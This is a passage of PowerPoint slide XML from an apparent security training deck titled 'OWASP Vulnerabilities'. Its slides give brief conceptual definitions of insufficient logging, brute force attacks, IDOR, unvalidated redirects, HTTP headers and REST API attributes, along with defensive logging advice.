          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="3892168"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit fontScale="55000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-GB" sz="4300" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Insufficient Logging and Monitoring</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-GB" sz="4300" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-GB" sz="4300" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Failing to log errors or attacks and poor monitoring practices can introduce a human element to security risks. Threat actors count on a lack of monitoring and slower remediation times so that they can carry out their attacks before you have time to notice or react.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-GB" sz="4300" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-GB" sz="4300" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To prevent issues with insufficient logging and monitoring, make sure that all login failures, access control failures, and server-side input validation failures are logged with context so that you can identify suspicious activity. Penetration testing is a great way to find areas of your application with insufficient logging too. Establishing effective monitoring practices is also essential.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="233011063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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP VULNERABILITIES</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="3892168"/>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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Brute Force Attack?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base"/>
            <a:endParaRPr lang="en-GB" sz="3600" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A brute force attack uses trial-and-error to guess login info, encryption keys, or find a hidden web page. Hackers work through all possible combinations hoping to guess correctly.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>These attacks are done by ‘brute force’ meaning they use excessive forceful attempts to try and ‘force’ their way into your private account(s).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base"/>
            <a:endParaRPr lang="en-GB" sz="3600" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This is an old attack method, but it's still effective and popular with hackers. Because depending on the length and complexity of the password, cracking it can take anywhere from a few seconds to many years.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="4300" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23658124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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP VULNERABILITIES</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Insecure Direct Object Reference: A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="290922354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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IDOR</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{E164FAB9-4FF9-499A-B7A6-FC94A2C4A6E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2795587" y="814387"/>
            <a:ext cx="6600825" cy="5229225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="271027521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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Unvalidated Redirects &amp; Forwards</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{8FC95B4A-6D09-44F1-AAE2-677762994DE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3724275" y="923925"/>
            <a:ext cx="4743450" cy="5010150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="187999417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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP HEADERS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>REQUEST HEADERS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RESPONSE HEADERS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="220879680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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>REST API ATTRIBUTES</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP METHOD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
